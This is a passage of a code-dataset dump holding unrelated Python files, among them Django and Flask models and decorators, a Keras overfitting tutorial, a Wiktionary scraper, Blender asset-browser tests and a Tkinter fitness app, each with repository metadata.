equal to 4000\"\n\n\"\"\"\nA new and smaller method with divmod\n\"\"\"\n\nNUMERAL_TO_ROMAN = [(1000, \"M\"), (900, \"CM\"), (500, \"D\"), (400, \"CD\"),\n (100, \"C\"), (90, \"XC\"), (50, \"L\"), (40, \"XL\"),\n (10, \"X\"), (9, \"IX\"), (5, \"V\"), (4, \"IV\"), (1, \"I\")]\n\n\ndef _convert_to_roman_numeral(number: int) -> str:\n \"\"\"Convert number to a roman numeral string\"\"\"\n result = list()\n for numeral, roman in NUMERAL_TO_ROMAN:\n count, number = divmod(number, numeral)\n result.append(roman * count)\n return \"\".join(result)\n\n\n# Calculates the time taken to run both the methods in microseconds\nt1 = time.now().microsecond\nprint(convert_roman(1000))\nt2 = time.now().microsecond\nprint(roman_converter(1000))\nt3 = time.now().microsecond\nprint(_convert_to_roman_numeral(1000))\nt4 = time.now().microsecond\n# Print the times\nprint(t2 - t1)\nprint(t3 - t2)\nprint(t4 - t3)\n# Print the improvement of the second approach over the first\nprint(round((abs((t3 - t2) - (t2 - t1)) / (t2 - t1)) * 100, 2)) # Comparison of 2nd and 1st method\nprint(round((abs((t4 - t3) - (t3 - t2)) / (t3 - t2)) * 100, 2)) # Comparison of 3rd and 2nd method\nprint(round((abs((t4 - t3) - (t2 - t1)) / (t2 - t1)) * 100, 2)) # Comparison of 3rd and 1st method\n","repo_name":"sathyaghan/Code_Optimization","sub_path":"RomanNumeral.py","file_name":"RomanNumeral.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10089395726","text":"\nimport os\n\n\"\"\"\nGets an environment variable and closes the program if it doesn't exist.\n\"\"\"\ndef get_env_or_exit(name):\n # Get the variable if possible\n var = os.environ.get(name, None)\n # If it doesn't exist, print a warning and exit\n if var == None:\n print(f\"Looking Glass can't work without the environment variable {name} being set.\")\n print(\"Please set this variable and restart the Looking Glass server.\")\n exit()\n # Otherwise, return the variable\n return var","repo_name":"githubcatw/looking-glass-public","sub_path":"server/common/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31441262650","text":"from django.db import models\n\n# Create your models here.\n\n\ndef get_default_following():\n return {\"following\": []}\n\n\ndef get_default_followers():\n return {\"followers\": []}\n\n\nclass ClonestagramUser(models.Model):\n username = models.CharField(max_length=200)\n email = models.EmailField()\n password = models.CharField(max_length=250)\n following = models.JSONField(default=get_default_following)\n followers = models.JSONField(default=get_default_followers)\n profile_image = models.CharField(max_length=500, default=\"default\")\n date_registered = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.username\n\n\nclass Post(models.Model):\n author = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n post_text = models.TextField()\n date_posted = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.post_text\n\n\nclass PostImage(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n post_image = models.JSONField(encoder=None)\n\n class Meta:\n ordering = ['id']\n\n\nclass Comment(models.Model):\n author = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n comment = models.TextField()\n time = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.comment\n\n\nclass PostLike(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n liked_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n\n\nclass CommentLike(models.Model):\n comment = models.ForeignKey(Comment, on_delete=models.CASCADE)\n liked_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n\n\nclass SavedPost(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n saved_by = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n\n class Meta:\n ordering = ['id']\n","repo_name":"qoudri4re/clonestagram","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41022284001","text":"# PL { doc {} , aulas { { f1,f2,f3} } }\n# PL { doc {} , aulas { { f1,f2,f3} } }\n\nimport ply.lex as lex\n\ntokens = ['CHAV_ABRIR','CHAV_FECHAR','VIRG','NAME']\n\nt_CHAV_ABRIR = r'{'\nt_CHAV_FECHAR = r'}'\nt_VIRG = r','\nt_NAME = r'[a-zA-Z0-9\\-]+'\n\n\nt_ignore = \" \\t\\n\"\n\ndef t_error(t):\n print('Caráter ilegal: ', t.value[0])\n t.lexer.skip(1)\n\nlexer = lex.lex()\n\n","repo_name":"rushmetra/PL-Exercises","sub_path":"Aula08/exercicio2_lex.py","file_name":"exercicio2_lex.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7675247222","text":"# Import libraries\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport codecs\nimport mysql.connector as MySQL\nmysql = MySQL.connect(host='localhost',\n database='ar_nlg'\n , user='root'\n , password='')\nmycursor = mysql.cursor(dictionary=True)\n\n\n\ndef insertAdjectiveRoot(adjective):\n insert_query=(\"INSERT INTO `adjectives_root`( `adjective_root`) VALUES (%(adjective)s)\")\n insert_data = {\n 'adjective': adjective,\n }\n mycursor.execute(insert_query,insert_data)\n mysql.commit()\n return\n\n\nfrist_adj=\"آت\"\nfor i in range(10):#range(44):\n url='https://en.wiktionary.org/w/index.php?title=Category:Arabic_adjectives&pagefrom='+frist_adj\n\n # Connect to the URL\n response = requests.get(url)\n response.encoding = \"utf-8\"\n adjectives=[]\n\n # Parse HTML and save to BeautifulSoup object¶\n soup = BeautifulSoup(response.text, \"html.parser\")\n div= soup.find('div', attrs={'id':'mw-pages'})\n\n\n try:\n for ul in div.findAll('ul'):\n for li in ul.findAll('li'):\n a=li.find('a')\n adjectives.append(a.text.strip())\n frist_adj=a.text.strip()\n insertAdjectiveRoot(frist_adj)\n\n except Exception as e:\n continue\n\n print(frist_adj)\n","repo_name":"WaelMohammedAbed/Natural-Language-Generation-for-the-Arabic-Language","sub_path":"data_parsing_code/scrap_wiki_adj_roots.py","file_name":"scrap_wiki_adj_roots.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"74894964725","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 17 21:30:20 2018\n\n@author: LIKS\n\n模块功能:\n-将所有字词的向量保存到.npy便于用numpy计算\n-将所有字词Series,便于后面将训练数据数字化为整数1,2,3...的形式\n-处理特殊字符如 PAD填充符 UNK罕见字符\n\n该功能模块编程技巧不高,只需对各个类库熟悉\n\"\"\"\nimport word2vec\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\n\nSPECIAL_SYMBOL=['','']\nn_special_sym=len(SPECIAL_SYMBOL)\nembedding_size=256\n\n\ndef get_word_embedding():\n print('start to load word2vec...')\n wv=word2vec.load('../raw_data/word_embedding.txt')\n word_embedding=wv.vectors\n words=wv.vocab\n \n #用Series存放word\n sr_id2word=pd.Series(words,index=range(n_special_sym,n_special_sym+len(words)))\n sr_word2id=pd.Series(range(n_special_sym,n_special_sym+len(words)),index=words)\n \n \n #Series中加入特殊字符\n for i in range(n_special_sym):\n sr_id2word[i]=SPECIAL_SYMBOL[i]\n sr_word2id[SPECIAL_SYMBOL[i]]=i\n \n #加入特殊字符的向量\n vec_special_sym=np.random.randn(n_special_sym,embedding_size)\n word_embedding=np.vstack((vec_special_sym,word_embedding))\n \n #保存词向量\n save_path='../data/'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n np.save(save_path+'word_embedding.npy',word_embedding)\n #dump几次后面就要load几次\n with open(save_path+'sr_word2id.pkl','wb') as outp:\n pickle.dump(sr_id2word,outp,True)\n pickle.dump(sr_word2id,outp,True)\n print('word_embdding.npy saved... sr_word2id pickled...')\n \ndef get_char_embedding():\n print('getting the char embeddings...')\n wv=word2vec.load('../raw_data/char_embedding.txt')\n char_embedding=wv.vectors\n chars=wv.vocab\n \n sr_id2char=pd.Series(chars, index=range(n_special_sym, n_special_sym+len(chars)))\n sr_char2id=pd.Series(range(n_special_sym, n_special_sym+len(chars)),index=chars)\n \n for i in range(n_special_sym):\n sr_id2char[i]=SPECIAL_SYMBOL[i]\n sr_char2id[SPECIAL_SYMBOL[i]]=i\n \n vec_special_sym=np.random.randn(n_special_sym,embedding_size)\n char_embedding=np.vstack((vec_special_sym,char_embedding))\n \n #保存字向量\n save_path='../data/'\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n np.save(save_path+'char_embedding.npy',char_embedding)\n \n with open(save_path+'sr_char2id.pkl','wb') as outp:\n pickle.dump(sr_id2char,outp,True)\n pickle.dump(sr_char2id,outp,True)\n print('char_embdding.npy saved... sr_char2id pickled...')\n \nif __name__=='__main__':\n get_word_embedding()\n get_char_embedding()","repo_name":"FinIoT/zhihu_text_classification","sub_path":"embed2ndarray.py","file_name":"embed2ndarray.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24396631472","text":"\"\"\"Base Model Implemenation.\"\"\"\n\nfrom collections import OrderedDict\n\nfrom .exceptions import ObjectDoesNotExist\nfrom .fields import Field, Serial\nfrom .fieldslist import FieldsList, exclude\nfrom .managers import ModelManager\nfrom .storage import Storage\nfrom ..utils.comboprops import comboproperty\n\n\nclass ModelMeta:\n \"\"\"Model Descriptor Class.\"\"\"\n\n def __init__(self, model):\n \"\"\"Setup Descriptor.\"\"\"\n self.model = model\n self.name = model.__name__\n self.storagename = self.name.lower()\n self.pk = 'id'\n self.storages = []\n self.fields = OrderedDict()\n self.constraints = {\n 'unique': (),\n 'index': (),\n }\n # instance db state: 0 - unsaved; 1 - saved;\n self.db_state = 0\n\n\nclass ModelMetaBase(type):\n \"\"\"Model Meta Class.\"\"\"\n\n @classmethod\n def __prepare__(cls, name, bases, **kwargs):\n \"\"\"Make a namespace dict Orderd.\"\"\"\n return OrderedDict()\n\n def __new__(cls, name, bases, nmspc, **kwargs):\n \"\"\"Override model class creation.\"\"\"\n parents = [b for b in bases if isinstance(b, ModelMetaBase)]\n if not parents:\n return type.__new__(cls, name, bases, nmspc)\n\n module = nmspc.pop('__module__')\n model = type.__new__(cls, name, bases, {'__module__': module})\n\n _meta = nmspc.pop('Meta', None)\n\n meta = ModelMeta(model)\n meta.storagename = getattr(_meta, 'storagename', meta.storagename)\n meta.constraints['unique'] = getattr(_meta, 'unique', ())\n meta.constraints['index'] = getattr(_meta, 'index', ())\n\n # set serial field\n meta.fields[meta.pk] = Serial()\n meta.fields[meta.pk].name = meta.pk\n # parse declared fields\n for n, attr in nmspc.items():\n # handle declared fields\n if isinstance(attr, Field):\n attr.name = n\n meta.fields[n] = attr\n\n # set the rest declared attributes as is\n else:\n setattr(model, n, attr)\n\n # define model storage\n storage = Storage(meta.storagename, meta.fields, meta.constraints)\n meta.storages.append(storage)\n\n # set model fields as pointers to storage fields (columns)\n for n, f in meta.fields.items():\n setattr(model, n, storage.c[n])\n\n model._meta = meta\n model.list = ModelManager(model)\n model.DoesNotExist = type('DoesNotExist',\n (ObjectDoesNotExist,),\n {'__module__': module})\n\n return model\n\n def __repr__(self):\n \"\"\"Override representation.\"\"\"\n return u'' % self.__name__\n\n\nclass Model(metaclass=ModelMetaBase):\n \"\"\"Base Model.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Fill the model fields with supplied data.\"\"\"\n self.__fill(**kwargs)\n\n # @property\n # def pk(self):\n # return getattr(self, self._meta.pk)\n\n @comboproperty\n def pk(self):\n \"\"\"Primary key wrapper.\"\"\"\n return getattr(self, self._meta.pk)\n\n @pk.classproperty\n def pk(self):\n \"\"\"Primary key wrapper.\"\"\"\n return getattr(self, self._meta.pk)\n\n @classmethod\n def from_db(cls, **kwargs):\n \"\"\"Init model with data loaded from the db.\"\"\"\n instance = cls(**kwargs)\n instance._meta.db_state = 1\n return instance\n\n def __fill(self, **kwargs):\n for n, v in self._meta.fields.items():\n val = kwargs.pop(n, v.default)\n if hasattr(val, '__call__'):\n val = val()\n\n setattr(self, n, val)\n\n # set the rest object attributes\n for n, v in kwargs.items():\n setattr(self, n, v)\n\n async def to_dict(self, *fields, **options):\n \"\"\"Prepare python dict representation of the model instance.\n\n Usage:\n to_dict(field_name1, field_name2,\n exclude(field_name3),\n custom(custom_field_name=method_or_property_name)\n )\n\n means that we want to build a dict with a field field_name1,\n field_name2 and custom_field_name excluding field_name3.\n wherein custom_file_name will actully point to another field or\n method of the model.\n\n \"\"\"\n fl = options.pop('fieldslist', FieldsList()).append(*fields)\n result = {fld: value for fld, value in self if fld in fl}\n # handle custom fields\n for alias, fpath in fl.custom:\n obj = self\n for fld in fpath:\n obj = getattr(obj, fld, None)\n\n value = obj() if hasattr(obj, '__call__') else obj\n # if not is_protected_type(value):\n # if hasattr(value, 'to_dict'):\n # value = value.to_dict(**self._options)\n # else:\n # value = str(value)\n result[fld] = value\n\n # handle related fields\n for fld, sfl in fl.related.items():\n result[fld] = getattr(self, fld).to_dict(fields_list=sfl)\n\n return result\n\n async def save(self, db):\n \"\"\"Save model instance to the database.\"\"\"\n if self.pk and self._meta.db_state == 1:\n # update previosly saved object record\n data = await self.to_dict(exclude(type(self)._meta.pk))\n r = await self.list(db).filter(\n type(self).pk == self.pk).update(**data)\n else:\n # insert new object record\n r = await self.list(db).insert(**dict(self))\n self._meta.db_state = 1\n\n self.__fill(**r)\n\n async def delete(self, db):\n \"\"\"Delete model instance from the database.\"\"\"\n if self.pk and self._meta.db_state == 1:\n await self.list(db).delete(type(self).pk == self.pk)\n # reset instance primary key to None\n setattr(self, type(self)._meta.pk, None)\n\n def __iter__(self):\n \"\"\"Override model iterator.\n\n It should yield model field name and it's value as a tupel.\n \"\"\"\n for n in self._meta.fields.keys():\n yield (n, getattr(self, n, None))\n\n def __repr__(self):\n \"\"\"Represenation.\"\"\"\n return u'<%s : %s>' % (self._meta.name, self.pk)\n","repo_name":"RTyy/aiocomments","sub_path":"source/core/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3371825572","text":"class yrange:\n def __init__(self,*args):\n if len(args)>3 or len(args)==0:\n raise Exception\n if len(args) == 2:\n self.start = args[0]\n self.end = args[1]\n else :\n self.start = 0\n self.end =args[0]\n def __iter__(self):\n return self\n def __next__(self):\n if self.start < self.end:\n res = self.start\n self.start +=1\n return res\n else:\n return StopIteration\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"redliu312/py_learning","sub_path":"learn_iter/learn_it.py","file_name":"learn_it.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7397550448","text":"import json\n\nfrom flask import request, session\n\nfrom portfolio.internal.biz.services.account_role import AccountRoleService\nfrom portfolio.internal.biz.services.auth_service import AuthService\nfrom portfolio.models.account_role import AccountRole\nfrom portfolio.models.account_session import AccountSession\n\n\ndef check_account_role(func):\n def wrapper(*args, **kwargs):\n if request.method == 'POST':\n if not request.form.get('role_id'):\n return json.dumps(\"Выберите роль\")\n account_role = AccountRole(id=request.form.get('role_id'))\n account_role, err = AccountRoleService.get_name_by_id(account_role)\n if err:\n return json.dumps(err)\n response = func(*args, account_role_id=account_role.id, **kwargs)\n return response\n elif request.method == 'GET':\n list_account_role, err = AccountRoleService.get_all()\n if err:\n return json.dumps(err)\n\n response = func(*args, list_account_role=list_account_role, **kwargs)\n return response\n\n wrapper.__name__ = func.__name__\n return wrapper\n\n\ndef check_account_role_organisation_and_login_required(func):\n def wrapper(*args, **kwargs):\n if not session.get('auth-token'):\n return \"Где токен?\"\n\n session_id = AccountSession.get_session_id_from_token(session.get('auth-token'))\n if not session_id:\n return \"Невалидный или недействительный токен\"\n\n account_main, err = AuthService.get_account_main_by_session_id_with_confirmed(session_id)\n if err:\n return \"HZ\"\n\n if not account_main:\n return \"Невалидный или недействительный токен\"\n\n if not account_main.is_confirmed:\n return \"Пожалуйста, подтвердите email\"\n\n account_role_id = AccountRole.get_account_role_from_token(session.get('auth-token'))\n\n if not account_role_id:\n return \"Невалидный или устаревший токен\"\n\n if account_role_id != 1:\n return \"Недостаточно прав\"\n response = func(*args, *kwargs)\n return response\n wrapper.__name__ = func.__name__\n return wrapper\n\n\ndef check_account_role_parents_and_login_required(func):\n def wrapper(*args, **kwargs):\n if not session.get('auth-token'):\n return \"Где токен?\"\n\n session_id = AccountSession.get_session_id_from_token(session.get('auth-token'))\n if not session_id:\n return \"Невалидный или недействительный токен\"\n\n account_main, err = AuthService.get_account_main_by_session_id_with_confirmed(session_id)\n if err:\n return \"HZ\"\n\n if not account_main:\n return \"Невалидный или недействительный токен\"\n\n if not account_main.is_confirmed:\n return \"Пожалуйста, подтвердите email\"\n\n account_role_id = AccountRole.get_account_role_from_token(session.get('auth-token'))\n\n if not account_role_id:\n return \"Невалидный или устаревший токен\"\n\n if account_role_id != 2:\n return \"Недостаточно прав\"\n\n response = func(*args, auth_account_main_id=account_main.id, **kwargs)\n return response\n wrapper.__name__ = func.__name__\n return wrapper\n","repo_name":"kirillpechurin/digital_skills","sub_path":"portfolio/internal/http/wrappers/account_role.py","file_name":"account_role.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1248051674","text":"# -*- coding: UTF-8 -*-\n# 使用 regularization and dropout 來改進 IMDB movie review\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nNUM_WORDS = 10000\n\n(train_data, train_labels), (test_data, test_labels) = keras.datasets.imdb.load_data(num_words=NUM_WORDS)\n\ndef multi_hot_sequences(sequences, dimension):\n # Create an all-zero matrix of shape (len(sequences), dimension)\n results = np.zeros((len(sequences), dimension))\n for i, word_indices in enumerate(sequences):\n results[i, word_indices] = 1.0 # set specific indices of results[i] to 1s\n return results\n\n\ntrain_data = multi_hot_sequences(train_data, dimension=NUM_WORDS)\ntest_data = multi_hot_sequences(test_data, dimension=NUM_WORDS)\n\nplt.plot(train_data[0])\nplt.show()\n\n# Demonstrate overfitting\n## Create a baseline model\nbaseline_model = keras.Sequential([\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nbaseline_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nbaseline_model.summary()\n\nbaseline_history = baseline_model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## Create a smaller model\nsmaller_model = keras.Sequential([\n keras.layers.Dense(4, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(4, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nsmaller_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nsmaller_model.summary()\n\nsmaller_history = smaller_model.fit(train_data,\n train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## Create a bigger model\nbigger_model = keras.models.Sequential([\n keras.layers.Dense(512, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(512, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nbigger_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy','binary_crossentropy'])\n\nbigger_model.summary()\nbigger_history = bigger_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n## 畫圖比較三個 model 的表現\ndef plot_history(histories, key='binary_crossentropy'):\n plt.figure(figsize=(16,10))\n \n for name, history in histories:\n val = plt.plot(history.epoch, history.history['val_'+key],\n '--', label=name.title()+' Val')\n plt.plot(history.epoch, history.history[key], color=val[0].get_color(),\n label=name.title()+' Train')\n plt.xlabel('Epochs')\n plt.ylabel(key.replace('_',' ').title())\n plt.legend()\n plt.xlim([0,max(history.epoch)])\n\nplot_history([('baseline', baseline_history),\n ('smaller', smaller_history),\n ('bigger', bigger_history)])\nplt.show()\n# 發現越大的網路,建模的速度越快,但是也越容易 over-fitting\n\n\n## 加入權重試試看\nl2_model = keras.models.Sequential([\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\n activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\n activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\nl2_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy', 'binary_crossentropy'])\n\nl2_model_history = l2_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n\n# 畫圖跟原本的比較,會發現效果很好\nplot_history([('baseline', baseline_history),\n ('l2', l2_model_history)])\nplt.show()\n\n## 加入 dropout\n# dropout 是在訓練期間 layer 隨機 dropout (設為 0) feature 的 output.\n# 通常設定在 0.2 ~ 0.5 之間\ndpt_model = keras.models.Sequential([\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(16, activation=tf.nn.relu),\n keras.layers.Dropout(0.5),\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\ndpt_model.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy','binary_crossentropy'])\n\ndpt_model_history = dpt_model.fit(train_data, train_labels,\n epochs=20,\n batch_size=512,\n validation_data=(test_data, test_labels),\n verbose=2)\n# 畫圖跟原本的比較,會發現效果很好\nplot_history([('baseline', baseline_history),\n ('dropout', dpt_model_history)])\nplt.show()\n","repo_name":"bird1204/TFPractice","sub_path":"TensorFlow/Learn and use ML/05_OverFitting_and_underfitting.py","file_name":"05_OverFitting_and_underfitting.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70344358005","text":"from src.model.model import BaseModel\n\n\nclass Goods(BaseModel):\n def __init__(self, goods_id=-1, owner_id=-1, name='', price=-1, condition='', bargain=None):\n super().__init__(\n id=goods_id,\n owner_id=owner_id,\n name=name,\n price=price,\n condition=condition,\n bargain=bargain\n )\n\n def __eq__(self, other):\n return (\n self.id == other.id and\n self.owner_id == other.owner_id and\n self.name == other.name and\n self.price == other.price and\n self.condition == other.condition and\n ((not self.bargain and other.bargain == 'null') or\n str(self.bargain).lower() == str(other.bargain).lower())\n )\n\n","repo_name":"ilyasssklimov/bmstu_CourseProjectDB","sub_path":"src/model/goods.py","file_name":"goods.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19336176497","text":"from asset_browser_utilities.core.test.prop import TestOperator\nfrom asset_browser_utilities.module.asset.test.tool import assert_that_id_is_an_asset, assert_that_id_is_not_an_asset\nimport bpy\n\nfrom asset_browser_utilities.core.filter.type import get_object_types, get_types\nfrom asset_browser_utilities.module.asset.operator.mark import AssetMarkBatchExecute\n\nfrom asset_browser_utilities.module.asset.tool import all_assets_container_and_name\n\n\ndef test_marking_all_assets_in_current_file(filepath):\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n logic_class=AssetMarkBatchExecute,\n )\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n supported_asset_types = [a_t[0] for a_t in get_types()]\n for d in dir(bpy.data):\n container = getattr(bpy.data, d)\n if \"bpy_prop_collection\" in str(type(container)):\n if d in supported_asset_types:\n for asset in container:\n assert_that_id_is_an_asset(asset)\n else:\n for asset in container:\n assert_that_id_is_not_an_asset(asset)\n\n\ndef test_marking_different_asset_types_in_current_file(filepath):\n for asset_type_tuple in get_types():\n asset_type = asset_type_tuple[0]\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n filter_types={asset_type},\n filter_object_types=False,\n logic_class=AssetMarkBatchExecute,\n )\n assets_start = all_assets_container_and_name()\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n for d in dir(bpy.data):\n container = getattr(bpy.data, d)\n if \"bpy_prop_collection\" in str(type(container)):\n if d == asset_type:\n for asset in container:\n if (d, asset.name) in assets_start:\n continue\n assert_that_id_is_an_asset(asset)\n else:\n for asset in container:\n if (d, asset.name) in assets_start:\n continue\n assert_that_id_is_not_an_asset(asset)\n\n\ndef test_marking_different_object_types_in_current_file(filepath):\n for object_type_tuple in get_object_types():\n object_type = object_type_tuple[0]\n test_op = TestOperator(\n filepath=filepath,\n filter_assets=False,\n filter_types={\"objects\"},\n filter_object_types={object_type},\n logic_class=AssetMarkBatchExecute,\n )\n assets_start = all_assets_container_and_name()\n\n test_op.op_props.generate_previews = False\n\n test_op.execute()\n\n for obj in bpy.data.objects:\n if (\"objects\", obj.name) in assets_start:\n continue\n elif obj.type == object_type:\n assert_that_id_is_an_asset(obj)\n else:\n assert_that_id_is_not_an_asset(obj)\n","repo_name":"Gorgious56/asset_browser_utilities","sub_path":"module/asset/test/mark.py","file_name":"mark.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"76"} +{"seq_id":"43469234426","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom taggit.models import Tag\nfrom blog.models import Post\n\nimport markdown\n\nregister = template.Library()\n\n@register.simple_tag\ndef total_posts():\n return Post.published.count()\n\n@ register.inclusion_tag('latest_posts.html')\ndef show_latest_posts(count=5):\n latest_posts = Post.published.order_by('-publish')[:count]\n return {'latest_posts': latest_posts}\n\n@register.inclusion_tag('tag_list.html')\ndef show_all_tags():\n tag_list = Tag.objects.all()\n return {'tag_list': tag_list}\n\n@register.filter(name='markdown')\ndef markdown_format(text):\n return mark_safe(markdown.markdown(\n text,\n extensions=['extra','codehilite',],\n extension_configs={\n 'codehilite': [('css_class', 'highlight')]\n },\n output_format='html5'\n ))\n","repo_name":"ChiZhang9797/blog-app","sub_path":"blog/templatetags/blog_tags.py","file_name":"blog_tags.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14147693809","text":"from PIL import ImageTk as ImgTk\r\nfrom tkinter import *\r\nimport webbrowser\r\nimport threading\r\nimport cv2\r\n\r\n\r\ndef runExerciseDetection():\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n img = cap.read()[1]\r\n cv2.imshow(\"VizFit Exercise - Webcam\", img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n if cv2.getWindowProperty(\"VizFit Exercise - Webcam\", cv2.WND_PROP_VISIBLE) < 1:\r\n break\r\n\r\n cv2.destroyAllWindows()\r\n cap.release()\r\n\r\ndef startThread():\r\n thread1 = threading.Thread(target=runExerciseDetection)\r\n thread1.start()\r\n root.withdraw()\r\n\r\n while True:\r\n if thread1.is_alive():\r\n doNothing = 0\r\n else:\r\n root.deiconify()\r\n for widget in root.winfo_children():\r\n widget.destroy()\r\n break\r\n\r\n showResults()\r\n \r\n\r\ndef openToSite():\r\n webbrowser.open(\"https://mackey.cs.uafs.edu/\")\r\n\r\n\r\ndef showHome():\r\n def showLogin():\r\n def toWelcomefromHome():\r\n top.destroy()\r\n root.deiconify()\r\n\r\n logoLabel.destroy()\r\n loginButton.destroy()\r\n registerButton.destroy()\r\n instructions.destroy()\r\n filler.destroy()\r\n\r\n showWelcome()\r\n \r\n def closeLogin():\r\n top.destroy()\r\n root.deiconify()\r\n\r\n # Hide Home Page #\r\n root.withdraw()\r\n\r\n top = Toplevel()\r\n top.title(\"VizFit - Login\")\r\n top.config(bg=\"#434343\")\r\n top.resizable(False, False) \r\n topCanvas = Canvas(top, width=400, height=100, bg=\"#434343\", highlightthickness=0)\r\n topCanvas.grid(columnspan=3)\r\n\r\n\r\n # User Label & Entry #\r\n usernameLabel = Label(top, text=\"User:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\", anchor=\"w\")\r\n usernameLabel.grid(columnspan=2, column=0, row=0, padx=0)\r\n\r\n username = Entry(top, width=30)\r\n username.grid(columnspan=2, column=1, row=0, padx=(0,20), pady=0)\r\n\r\n\r\n # Password Label & Entry #\r\n passwordLabel = Label(top, text=\"Password:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\", anchor=\"w\")\r\n passwordLabel.grid(columnspan=2, column=0, row=1, padx=(0,50), pady=(0,30))\r\n\r\n password = Entry(top, width=30)\r\n password.grid(columnspan=2, column=1, row=1, padx=(0,20), pady=(0,30))\r\n\r\n\r\n # Submit Button 